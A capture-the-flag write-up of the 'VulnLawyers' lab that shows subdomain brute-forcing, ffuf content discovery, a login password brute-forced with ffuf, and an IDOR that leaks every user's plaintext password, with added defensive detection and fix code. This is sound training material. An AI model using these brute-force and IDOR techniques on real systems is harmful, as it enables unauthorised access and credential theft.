Vulnlawyers

DNS Recon

 nslookup -type=any vulnlawyers.co.uk 8.8.8.8
Server:		8.8.8.8
Address:	8.8.8.8#53

Non-authoritative answer:
Name:	vulnlawyers.co.uk
Address: 68.183.255.206
vulnlawyers.co.uk	nameserver = ns1.digitalocean.com.
vulnlawyers.co.uk	nameserver = ns2.digitalocean.com.
vulnlawyers.co.uk	nameserver = ns3.digitalocean.com.
vulnlawyers.co.uk
	origin = ns1.digitalocean.com
	mail addr = hostmaster.vulnlawyers.co.uk
	serial = 1626211986
	refresh = 10800
	retry = 3600
	expire = 604800
	minimum = 1800

Authoritative answers can be found from:

 dnsrecon -d vulnlawyers.co.uk -D ~/Dokumente/ctfchallenge/wordlists/subdomains.txt -t brt
[*] Performing host and subdomain brute force against vulnlawyers.co.uk
[*] 	 A data.vulnlawyers.co.uk 68.183.255.206
[*] 	 A www.vulnlawyers.co.uk 68.183.255.206
[+] 2 Records Found

Visiting http://data.vulnlawyers.co.uk gives the first flag:

{"name":"VulnLawyers Website API","version":"2.1.04","flag":"[^FLAG^E78DEBBFDFBEAFF1336B599B0724A530^FLAG^]"}

Content Discovery

❯ ./ffuf -w ~/Dokumente/ctfchallenge/wordlists/content.txt -t 1 -p 0.2 -H "Cookie: ctfchallenge=CENSORED" -u http://www.vulnlawyers.co.uk/FUZZ -mc all -fc 404

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.4.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://www.vulnlawyers.co.uk/FUZZ
 :: Wordlist         : FUZZ: /home/zerospl0it/Dokumente/ctfchallenge/wordlists/content.txt
 :: Header           : Cookie: ctfchallenge=CENSORED
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 1
 :: Delay            : 0.20 seconds
 :: Matcher          : Response status: all
 :: Filter           : Response status: 404
________________________________________________

css                     [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 29ms]
denied                  [Status: 401, Size: 1020, Words: 178, Lines: 30, Duration: 30ms]
images                  [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 31ms]
js                      [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 29ms]
login                   [Status: 302, Size: 1119, Words: 197, Lines: 31, Duration: 38ms]

When visiting http://vulnlawyers.co.uk/login we are instantly redirected to http://vulnlawyers.co.uk/denied, which tells us that we can't access that portal from our URL. Let's use curl to check whether the redirect response still leaks data (a broken redirect that sends a body along with the 302):

 curl -H "Cookie: ctfchallenge=CENSORED" http://vulnlawyers.co.uk/login
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>VulnLawyers - Old Login</title>
    <link href="/css/bootstrap.min.css" rel="stylesheet">
    <link href="/template-manager/style.css" rel="stylesheet">
</head>
<body>
<div class="container">
    <div class="row">
        <div class="col-md-12">
            <h1 style="padding-top:100px;text-align: center;color: #060505;letter-spacing: -1px;font-weight: bold">VulnLawyers</h1>
            <h3 class="text-center">We'll win that case!</h3>
        </div>
    </div>
    <div class="row">
        <div class="col-md-6 col-md-offset-3">
            <div class="alert alert-info">
                <p>Access to this portal can now be found here <a href=/lawyers-only">/lawyers-only</a></p>
                <p>[^FLAG^FB52470E40F47559EBA87252B2D4CF67^FLAG^]</p>
            </div>
        </div>
    </div>
</div>
<script src="/js/jquery.min.js"></script>
<script src="/js/bootstrap.min.js"></script>
</body>
</html>

API Discovery

Back in the DNS recon phase we found http://data.vulnlawyers.co.uk, which gave us the first flag and mentioned an API. Let's check whether we can find any useful endpoints:

❯ ./ffuf -w ~/Dokumente/ctfchallenge/wordlists/content.txt -t 1 -p 0.2 -H "Cookie: ctfchallenge=CENSORED" -u http://data.vulnlawyers.co.uk/FUZZ -mc all -fc 404


       v1.4.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://data.vulnlawyers.co.uk/FUZZ
 :: Wordlist         : FUZZ: /home/zerospl0it/Dokumente/ctfchallenge/wordlists/content.txt
 :: Header           : Cookie: ctfchallenge=CENSORED
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 1
 :: Delay            : 0.20 seconds
 :: Matcher          : Response status: all
 :: Filter           : Response status: 404
________________________________________________

campaigns               [Status: 429, Size: 169, Words: 7, Lines: 8, Duration: 27ms]
users                   [Status: 200, Size: 406, Words: 6, Lines: 1, Duration: 29ms]
web.config              [Status: 429, Size: 169, Words: 7, Lines: 8, Duration: 26ms]

Only users returns 200 (campaigns and web.config answered 429 Too Many Requests), so let's fetch it:

 curl -H "Cookie: ctfchallenge=CENSORED" http://data.vulnlawyers.co.uk/users | jq
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   406    0   406    0     0   6766      0 --:--:-- --:--:-- --:--:--  6766
{
  "users": [
    {
      "name": "Yusef Mcclain",
      "email": "yusef.mcclain@vulnlawyers.co.uk"
    },
    {
      "name": "Shayne Cairns",
      "email": "shayne.cairns@vulnlawyers.co.uk"
    },
    {
      "name": "Eisa Evans",
      "email": "eisa.evans@vulnlawyers.co.uk"
    },
    {
      "name": "Jaskaran Lowe",
      "email": "jaskaran.lowe@vulnlawyers.co.uk"
    },
    {
      "name": "Marsha Blankenship",
      "email": "marsha.blankenship@vulnlawyers.co.uk"
    }
  ],
  "flag": "[^FLAG^25032EB0D322F7330182507FBAA1A55F^FLAG^]"
}

Bruteforcing

We discovered the login page earlier during content discovery. Let's check whether we can brute-force a password using the user data we gathered from the API.

Let's check the login panel source:

<div class="panel-body">
    <form method="post">
        <div><label>User Email:</label></div>
        <div style="margin-top: 7px"><input class="form-control" name="email" ></div>
        <div style="margin-top: 7px"><label>Password:</label></div>
        <div><input class="form-control" type="password" name="password" ></div>
        <div style="margin-top:7px">
        <input type="submit" class="btn btn-success pull-right" value="Login"></div>

Using ffuf we brute-force the password, filtering out the 200 responses so only the differing status codes show:

❯ ./ffuf -w ~/Dokumente/ctfchallenge/wordlists/passwords.txt -X POST -d "email=jaskaran.lowe@vulnlawyers.co.uk&password=FUZZ" -t 1 -p 0.1 -H "Cookie: ctfchallenge=CENSORED" -H "Content-Type: application/x-www-form-urlencoded" -u http://www.vulnlawyers.co.uk/lawyers-only-login -mc all -fc 200

       v1.4.1-dev
________________________________________________

 :: Method           : POST
 :: URL              : http://www.vulnlawyers.co.uk/lawyers-only-login
 :: Wordlist         : FUZZ: /home/zerospl0it/Dokumente/ctfchallenge/wordlists/passwords.txt
 :: Header           : Cookie: ctfchallenge=CENSORED
 :: Header           : Content-Type: application/x-www-form-urlencoded
 :: Data             : email=jaskaran.lowe@vulnlawyers.co.uk&password=FUZZ
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 1
 :: Delay            : 0.10 seconds
 :: Matcher          : Response status: all
 :: Filter           : Response status: 200
________________________________________________

123456                  [Status: 401, Size: 1925, Words: 554, Lines: 48, Duration: 33ms]
password                [Status: 401, Size: 1925, Words: 554, Lines: 48, Duration: 32ms]
summer                  [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 30ms]
:: Progress: [101/101] :: Job [1/1] :: 7 req/sec :: Duration: [0:00:13] :: Errors: 0 ::

After logging in as jaskaran.lowe@vulnlawyers.co.uk with the password summer we find another flag: [^FLAG^7F1ED1F306FC4E3399CEE15DF4B0AE3C^FLAG^]
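The run above shows what the server side of that attack looks like: a burst of 401s from one client against /lawyers-only-login followed by a 302 on success, with no lockout in between. As an added example (not part of the original writeup), this script flags that pattern in combined-format access logs; the log lines are constructed sample data, and the 401/302 status codes are the ones seen in the ffuf output.

```python
import re
from collections import defaultdict

# Combined log format: ip ident user [time] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def build_sample_log():
    """Constructed sample access log (not real logs from the challenge):
    one client hammers the login form (many 401s, then a 302 on success)
    and one legitimate user mistypes a password once before succeeding."""
    fmt = ('{ip} - - [14/Jul/2021:10:00:{sec:02d} +0000] '
           '"POST /lawyers-only-login HTTP/1.1" {status} {size} "-" "curl/7.74.0"')
    lines = [fmt.format(ip="203.0.113.10", sec=s, status=401, size=1925)
             for s in range(12)]
    lines.append(fmt.format(ip="203.0.113.10", sec=13, status=302, size=0))
    lines.append(fmt.format(ip="198.51.100.7", sec=5, status=401, size=1925))
    lines.append(fmt.format(ip="198.51.100.7", sec=9, status=302, size=0))
    return "\n".join(lines)


def detect_login_bruteforce(log_text, path="/lawyers-only-login", threshold=10):
    """Return {ip: {"failures": n, "succeeded": bool}} for every client whose
    failed POSTs (401) to the login path reach `threshold`; `succeeded` is set
    when a 302 (the success redirect) arrives after the threshold was hit."""
    state = defaultdict(lambda: {"failures": 0, "succeeded": False})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or m["path"] != path:
            continue
        client = state[m["ip"]]
        if m["status"] == "401":
            client["failures"] += 1
        elif m["status"] == "302" and client["failures"] >= threshold:
            client["succeeded"] = True  # password was guessed after the burst
    return {ip: s for ip, s in state.items() if s["failures"] >= threshold}


if __name__ == "__main__":
    for ip, info in detect_login_bruteforce(build_sample_log()).items():
        print(f"{ip}: {info['failures']} failures, success={info['succeeded']}")
```

The legitimate user with a single typo stays below the threshold and is not reported; on a real site the same counter is what an account lockout or rate limit on the login route should be driven by.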

IDOR

While browsing the web portal we find a "Profile" tab at http://www.vulnlawyers.co.uk/lawyers-only-profile which should let us update our own details. I tried to change the name and recorded the request in my browser's dev console. It didn't work, but I got another URL which seems to be an API for user data. URL: http://www.vulnlawyers.co.uk/lawyers-only-profile-details/4

{"id":4,"name":"Jaskaran Lowe","email":"jaskaran.lowe@vulnlawyers.co.uk","password":"summer"}

Let's check for IDOR vulnerabilities by changing the id in the URL. URL: http://www.vulnlawyers.co.uk/lawyers-only-profile-details/1

{"id":1,"name":"Yusef Mcclain","email":"yusef.mcclain@vulnlawyers.co.uk","password":"Rk@c7#U3@2r%0f"}

URL: http://www.vulnlawyers.co.uk/lawyers-only-profile-details/2 gives another flag:

{"id":2,"name":"Shayne Cairns","email":"shayne.cairns@vulnlawyers.co.uk","password":"q2V944&#2a1^3p","flag":"[^FLAG^938F5DC109A1E9B4FF3E3E92D29A56B3^FLAG^]"}

URL: http://www.vulnlawyers.co.uk/lawyers-only-profile-details/3

{"id":3,"name":"Eisa Evans","email":"eisa.evans@vulnlawyers.co.uk","password":"Sn06#ibx@lGPG7"}

URL: http://www.vulnlawyers.co.uk/lawyers-only-profile-details/5

{"id":5,"name":"Marsha Blankenship","email":"marsha.blankenship@vulnlawyers.co.uk","password":"A^66vqhOU!e2ZV"}
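The profile-details endpoint above has two defects: it trusts the id in the URL without checking that the record belongs to the logged-in user, and it returns the stored password at all. As an added example (not the challenge's own code), here is a minimal handler modelled on that behaviour beside a hardened version; the user table is constructed sample data, and session handling is reduced to a user id parameter.

```python
# Constructed sample records keyed by id (not the challenge's real users).
USERS = {
    1: {"id": 1, "name": "Alice Example", "email": "alice@example.test", "password": "pw-1"},
    2: {"id": 2, "name": "Bob Example", "email": "bob@example.test", "password": "pw-2"},
}


class Forbidden(Exception):
    """Raised when the caller may not see the requested record."""


def profile_details_vulnerable(session_user_id, requested_id):
    # Only checks that *someone* is logged in, then trusts the id from the URL:
    # any authenticated user can read every other user's row, password included.
    if session_user_id is None:
        raise Forbidden("login required")
    return dict(USERS[requested_id])


def profile_details_hardened(session_user_id, requested_id):
    # 1. Authenticate.  2. Authorise: the record's owner must be the caller
    # (object-level access control, the actual fix for IDOR).  3. Never
    # return secrets: the password field is dropped from the response.
    if session_user_id is None:
        raise Forbidden("login required")
    record = USERS.get(requested_id)
    if record is None or record["id"] != session_user_id:
        # Same error for "not yours" and "does not exist", so the id space
        # cannot be mapped out through differing responses.
        raise Forbidden("not found")
    return {k: v for k, v in record.items() if k != "password"}


def can_read(handler, session_user_id, requested_id):
    """True if `handler` hands the record to this caller, False if it refuses."""
    try:
        handler(session_user_id, requested_id)
        return True
    except (Forbidden, KeyError):
        return False


if __name__ == "__main__":
    # user 1 asks for user 2's record through both handlers
    print("vulnerable:", can_read(profile_details_vulnerable, 1, 2))  # True
    print("hardened:  ", can_read(profile_details_hardened, 1, 2))    # False
    print("own record:", profile_details_hardened(1, 1))
```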

Final Flag

Logging in as Shayne Cairns we seem to have permission to delete cases. Let's examine this. After clicking on "delete case" we get the final flag: [^FLAG^B38BAE0B8B804FCB85C730F10B3B5CB5^FLAG^]
